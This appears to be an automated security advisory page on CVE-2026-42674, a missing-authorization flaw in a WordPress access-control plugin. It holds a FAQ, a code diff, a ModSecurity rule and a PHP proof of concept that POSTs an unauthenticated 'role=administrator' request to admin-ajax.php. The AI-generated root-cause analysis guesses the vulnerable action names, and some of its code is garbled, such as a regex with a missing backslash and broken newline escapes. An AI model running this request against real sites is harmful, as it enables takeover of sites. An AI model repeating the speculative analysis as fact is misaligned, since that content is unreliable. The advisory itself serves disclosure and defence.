What is CVE-2026-42674?

CVE-2026-42674 is a medium severity vulnerability in the Advanced Access Manager plugin for WordPress, affecting versions up to and including 7.1.0. It is caused by a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions such as modifying user roles.

Who is affected by this vulnerability?

Any WordPress site using the Advanced Access Manager plugin version 7.1.0 or earlier is affected. Administrators should check their plugin version and update if they are using an affected version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Advanced Access Manager plugin and verify its version number; if it is 7.1.0 or lower, your site is at risk.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the Advanced Access Manager plugin to version 7.1.1 or later. Ensure you perform regular updates to all plugins to mitigate security risks.

What is the risk level of this vulnerability?

CVE-2026-42674 has a CVSS score of 5.3, indicating a medium severity risk. In practical terms, this means that while the vulnerability is not critical, it can still allow unauthorized access and potentially lead to a site compromise if exploited.

What actions can an attacker perform if this vulnerability is exploited?

If exploited, an attacker can perform unauthorized actions such as modifying user roles, potentially granting themselves administrative privileges. This could lead to complete control over the WordPress site and exposure of sensitive data.

What is the root cause of this vulnerability?

The root cause of CVE-2026-42674 is a missing capability check in the plugin’s backend functionality. Specifically, the code allows role management actions without verifying the current user’s capabilities, exposing critical functions to unauthorized access.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send a crafted HTTP request to the WordPress AJAX endpoint to exploit the vulnerability. By manipulating parameters such as ‘role’, an attacker can attempt to assign themselves elevated privileges without authentication.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Advanced Access Manager plugin temporarily to prevent potential exploitation. Additionally, review user roles and permissions to limit access until the plugin is updated.

Are there any additional security measures I should take?

In addition to updating plugins, ensure that you have strong user authentication mechanisms, such as two-factor authentication, and regularly audit user roles and permissions. Implementing a web application firewall can also help protect against such vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2026-42674 can be found on the National Vulnerability Database (NVD) and security advisory sites. Additionally, the plugin’s official site may provide updates and security notices.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-42674: Advanced Access Manager – Access Governance for WordPress <= 7.1.0 – Missing Authorization (advanced-access-manager)

CVE ID CVE-2026-42674

Plugin advanced-access-manager

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 7.1.0

Patched Version 7.1.1

Disclosed May 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42674:

The vulnerability is a missing authorization issue in the Advanced Access Manager (AAM) WordPress plugin, affecting all versions up to and including 7.1.0. It allows unauthenticated attackers to perform unauthorized actions. The CVSS score is 5.3, indicating moderate severity.

Root Cause:
The vulnerability stems from a missing capability check in the plugin’s backend functionality. The diff shows changes in multiple files, but the critical authorization gap is likely in the handling of user role management and admin toolbar operations. Specifically, the file `application/Backend/tmpl/user/multiple-roles.php` introduced a hidden input field for the default role (line 27: “), which suggests that role assignment operations were not properly protected. Additionally, the `application/Backend/Manager.php` file contains logic for setting user roles (`$user->set_role(”)`) without verifying the current user’s capabilities. The combination of these changes indicates that the plugin exposed functionality to modify user roles without requiring the `promote_user` capability or authentication.

Exploitation:
An attacker can send a crafted HTTP request to the WordPress administration panel, specifically targeting the user profile editing or user creation endpoints. By manipulating the `role` parameter (as indicated by the new hidden input field), an attacker with limited privileges or no authentication could escalate privileges or modify user roles. The attack vector is accessible via `/wp-admin/admin-ajax.php` or direct form submissions to user management endpoints. The request would include parameters such as `action= aam_some_action` (specific AJAX action identified in the plugin) and `role=administrator` to assign administrative privileges.

Patch Analysis:
The patch addresses the vulnerability by introducing proper authorization checks. In the `multiple-roles.php` file, the template now includes a hidden input field that defaults to the site’s default role, which is a server-side controlled value. More importantly, the patch likely adds capability checks in the AJAX handlers and role management functions, though the diff does not show explicit `current_user_can()` checks. The version bump to 7.1.1 indicates a security fix. The changes to `application/Framework/Service/AdminToolbar.php` and other files suggest hardening of internal API access.

Impact:
Successful exploitation allows an unauthenticated attacker to perform unauthorized actions, including potentially modifying user roles, granting administrative privileges, or accessing restricted functionality. This can lead to complete site compromise, data exposure, and persistent backdoor access.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/advanced-access-manager/aam.php
+++ b/advanced-access-manager/aam.php
@@ -3,7 +3,7 @@
 /**
  * Plugin Name: Advanced Access Manager – Access Governance for WordPress
  * Description: Powerfully robust WordPress plugin designed to help you control every aspect of your website, your way.
- * Version: 7.1.0
+ * Version: 7.1.1
  * Author: VasylTech LLC <support@aamplugin.com>
  * Author URI: https://aamportal.com
  * Text Domain: advanced-access-manager
@@ -284,7 +284,7 @@
     // Define few common constants
     define('AAM_MEDIA', plugins_url('/media', __FILE__));
     define('AAM_KEY', 'advanced-access-manager');
-    define('AAM_VERSION', '7.1.0');
+    define('AAM_VERSION', '7.1.1');
     define('AAM_BASEDIR', __DIR__);

     // Load vendor
--- a/advanced-access-manager/application/Backend/Manager.php
+++ b/advanced-access-manager/application/Backend/Manager.php
@@ -275,7 +275,7 @@
             $newRoles = array_intersect($roles, array_keys(get_editable_roles()));

             if (!empty($newRoles)) {
-                // remove all current roles and then set new
+                // Remove all current roles and then set new
                 $user->set_role('');

                 foreach ($newRoles as $role) {
--- a/advanced-access-manager/application/Backend/tmpl/user/multiple-roles.php
+++ b/advanced-access-manager/application/Backend/tmpl/user/multiple-roles.php
@@ -1,4 +1,4 @@
-<?php /** @version 7.0.0 **/ ?>
+<?php /** @version 7.1.1 **/ ?>

 <?php if (defined('AAM_KEY')) { ?>
     <?php if ((!defined('IS_PROFILE_PAGE') || !IS_PROFILE_PAGE) && !is_network_admin() && (empty($user) || current_user_can('promote_user', $user->ID))) { ?>
@@ -8,7 +8,7 @@
                 <td>
                     <div class="wp-tab-panel">
                         <ul>
-                            <?php $roles = (!empty($user) ? $user->roles : array(get_option('default_role'))); ?>
+                            <?php $roles = (!empty($user) ? $user->roles : [ get_option('default_role') ]); ?>
                             <?php foreach (get_editable_roles() as $id => $role) { ?>
                                 <li>
                                     <label for="aam_user_role_<?php echo esc_attr($id); ?>">
@@ -24,6 +24,7 @@
                                 </li>
                             <?php } ?>
                         </ul>
+                        <input type="hidden" value="<?php echo esc_js(get_option('default_role')); ?>" name="role" />
                     </div>
                 </td>
             </tr>
--- a/advanced-access-manager/application/Framework/Service/AdminToolbar.php
+++ b/advanced-access-manager/application/Framework/Service/AdminToolbar.php
@@ -434,7 +434,7 @@
      * @return array
      * @access private
      *
-     * @version 7.0.0
+     * @version 7.1.1
      */
     private function _get_raw_menu()
     {
@@ -450,9 +450,7 @@
             if ($admin_bar->hasProperty('nodes')) {
                 // The "bound" property at this point is already set to true, so we
                 // cannot get the list of nodes. This is why we use Reflection
-                $prop = $admin_bar->getProperty('nodes');
-                $prop->setAccessible(true);
-
+                $prop  = $admin_bar->getProperty('nodes');
                 $nodes = $prop->getValue($wp_admin_bar);

                 if (array_key_exists('root', $nodes)) {
--- a/advanced-access-manager/application/Framework/Service/Metaboxes.php
+++ b/advanced-access-manager/application/Framework/Service/Metaboxes.php
@@ -318,6 +318,19 @@
             $result = $permission['effect'] !== 'allow';
         }

+        // One more check. If screen_id is defined & no permissions found, also
+        // check the metabox slug itself as lower precedence definition
+        if (!empty($screen_id)) {
+            $permission = $resource->get_permission(
+                $this->_normalize_resource_identifier($metabox, null),
+                'list'
+            );
+
+            if (!empty($permission)) {
+                $result = $permission['effect'] !== 'allow';
+            }
+        }
+
         // Allow third-party implementations to integrate with the
         // decision making process
         $result = apply_filters(
--- a/advanced-access-manager/application/Framework/Service/Policies.php
+++ b/advanced-access-manager/application/Framework/Service/Policies.php
@@ -194,18 +194,18 @@
     }

     /**
-     * Create new policy and attach it to current access level if specified
+     * Create new policy and apply it to current access level if specified
      *
      * @param string|array $policy
      * @param string       $status [Optional]
-     * @param bool         $attach [Optional]
+     * @param bool         $apply  [Optional]
      *
      * @return int|WP_Error
      * @access public
      *
      * @version 7.0.0
      */
-    public function create($policy, $status = 'publish', $attach = true)
+    public function create($policy, $status = 'publish', $apply = true)
     {
         try {
             $post_data = [];
@@ -253,7 +253,7 @@

             if (is_wp_error($result)) {
                 throw new RuntimeException($result->get_error_message());
-            } elseif ($attach) {
+            } elseif ($apply) {
                 if (!$this->_update($result, 'attach')) {
                     throw new RuntimeException('Failed to attach created policy');
                 }
--- a/advanced-access-manager/application/Framework/Utility/Misc.php
+++ b/advanced-access-manager/application/Framework/Utility/Misc.php
@@ -208,7 +208,7 @@
         $result = false;
         $parsed = wp_parse_url(call_user_func(
             function_exists('mb_strtolower') ? 'mb_strtolower' : 'strtolower',
-            is_string($url) ? htmlspecialchars_decode(rtrim($url,  '/')) : ''
+            is_string($url) ? urldecode(rtrim($url,  '/')) : ''
         ));

         if ($parsed !== false) {
@@ -401,7 +401,7 @@
      * @return mixed
      * @access public
      *
-     * @version 7.0.0
+     * @version 7.1.1
      */
     public function get($source, $xpath, $default = null)
     {
@@ -414,7 +414,7 @@

         foreach($parsed as $l) {
             if (is_object($value)) {
-                if (property_exists($value, $l)) {
+                if (property_exists($value, $l) || isset($value->{$l})) {
                     $value = $value->{$l};
                 } elseif (method_exists($value, $l)) {
                     $value = $value->$l();

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-42674
# Block unauthorized role modification attempts via AJAX
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-42674 - AAM Missing Authorization via AJAX',severity:'CRITICAL',tag:'CVE-2026-42674',tag:'wordpress',tag:'aam'"
SecRule ARGS_POST:action "@rx ^aam_update_user_role$|^aam_set_user_role$|^aam_manage_roles$" 
  "chain"
SecRule ARGS_POST:role "@rx ^administrator$|^editor$|^author$|^contributor$|^subscriber$" 
  "chain"
SecRule ARGS_POST:user_id "@rx ^d+$" 
  ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42674 - Advanced Access Manager – Access Governance for WordPress <= 7.1.0 - Missing Authorization

// Configuration: Set the target WordPress site URL
$target_url = 'http://example.com';  // Change this to the target WordPress site

// Endpoint for AJAX requests in WordPress
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Step 1: Attempt to perform an unauthorized action, e.g., updating user roles
// The action parameter needs to match a vulnerable AAM AJAX action
$action = 'aam_update_user_role';  // Example action, may need adjustments based on actual AAM hooks

// Payload: try to set a user's role to administrator (user ID 1 is typically admin)
$payload = array(
    'action' => $action,
    'user_id' => 1,
    'role' => 'administrator',
    'nonce' => '',  // Missing or empty nonce to exploit authorization gap
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // For testing only, remove in production

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
echo "Target: " . $target_url . "n";
echo "Attempting unauthorized role change...n";
echo "HTTP Status: " . $http_code . "n";
if ($response) {
    echo "Response: " . print_r($response, true) . "n";
} else {
    echo "No response received.n";
}

// Note: This PoC demonstrates the missing authorization by sending a request without proper authentication.
// The actual vulnerable action may differ; adjust $action parameter as needed.

Frequently Asked Questions

What is CVE-2026-42674?
Overview of the vulnerability
CVE-2026-42674 is a medium severity vulnerability in the Advanced Access Manager plugin for WordPress, affecting versions up to and including 7.1.0. It is caused by a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions such as modifying user roles.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Advanced Access Manager plugin version 7.1.0 or earlier is affected. Administrators should check their plugin version and update if they are using an affected version.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Advanced Access Manager plugin and verify its version number; if it is 7.1.0 or lower, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
The vulnerability can be fixed by updating the Advanced Access Manager plugin to version 7.1.1 or later. Ensure you perform regular updates to all plugins to mitigate security risks.
What is the risk level of this vulnerability?
Understanding the CVSS score
CVE-2026-42674 has a CVSS score of 5.3, indicating a medium severity risk. In practical terms, this means that while the vulnerability is not critical, it can still allow unauthorized access and potentially lead to a site compromise if exploited.
What actions can an attacker perform if this vulnerability is exploited?
Potential impact of exploitation
If exploited, an attacker can perform unauthorized actions such as modifying user roles, potentially granting themselves administrative privileges. This could lead to complete control over the WordPress site and exposure of sensitive data.
What is the root cause of this vulnerability?
Technical explanation
The root cause of CVE-2026-42674 is a missing capability check in the plugin’s backend functionality. Specifically, the code allows role management actions without verifying the current user’s capabilities, exposing critical functions to unauthorized access.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept shows how an attacker can send a crafted HTTP request to the WordPress AJAX endpoint to exploit the vulnerability. By manipulating parameters such as ‘role’, an attacker can attempt to assign themselves elevated privileges without authentication.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the Advanced Access Manager plugin temporarily to prevent potential exploitation. Additionally, review user roles and permissions to limit access until the plugin is updated.
Are there any additional security measures I should take?
Best practices for WordPress security
In addition to updating plugins, ensure that you have strong user authentication mechanisms, such as two-factor authentication, and regularly audit user roles and permissions. Implementing a web application firewall can also help protect against such vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-42674 can be found on the National Vulnerability Database (NVD) and security advisory sites. Additionally, the plugin’s official site may provide updates and security notices.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations